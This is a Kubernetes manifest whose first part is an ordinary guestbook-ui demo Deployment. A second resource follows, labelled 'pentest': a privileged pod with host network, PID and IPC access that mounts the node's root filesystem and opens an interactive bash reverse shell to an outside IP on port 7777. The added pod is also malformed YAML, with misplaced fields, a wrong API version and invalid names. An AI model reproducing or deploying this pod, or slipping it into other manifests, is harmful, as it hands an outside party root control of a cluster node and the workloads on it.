apiVersion: apps/v1
kind: Deployment
metadata:
  name: guestbook-ui
spec:
  replicas: 1
  revisionHistoryLimit: 3
  selector:
    matchLabels:
      app: guestbook-ui
  template:
    metadata:
      labels:
        app: guestbook-ui
    spec:
      containers:
      - image: gcr.io/heptio-images/ks-guestbook-demo:0.2
        name: guestbook-ui
        ports:
        - containerPort: 80
---
apiVersion: apps/v1
kind: Pod
metadata:
  name: everything allowed reverse shell pod
  labels:
    app: pentest
spec:
  hostNetwork: true
  hostPID: true
  hostIPC: true
  containers:
  -  name: reverse shell
  image: ubuntu
  command: ["/bin/bash", "-c", "--"]
  args: ["bash -i >& /dev/tcp/4.242.16.43/7777 0>&1"]
  securityContext:
    privileged: true
  volumeMounts:
    - mountPath: /host
      name: noderoot
  nodename: aks-userpool-01500227-vmss000001
  volumes:
    - name: noderoot
      hostPath:
        path: /
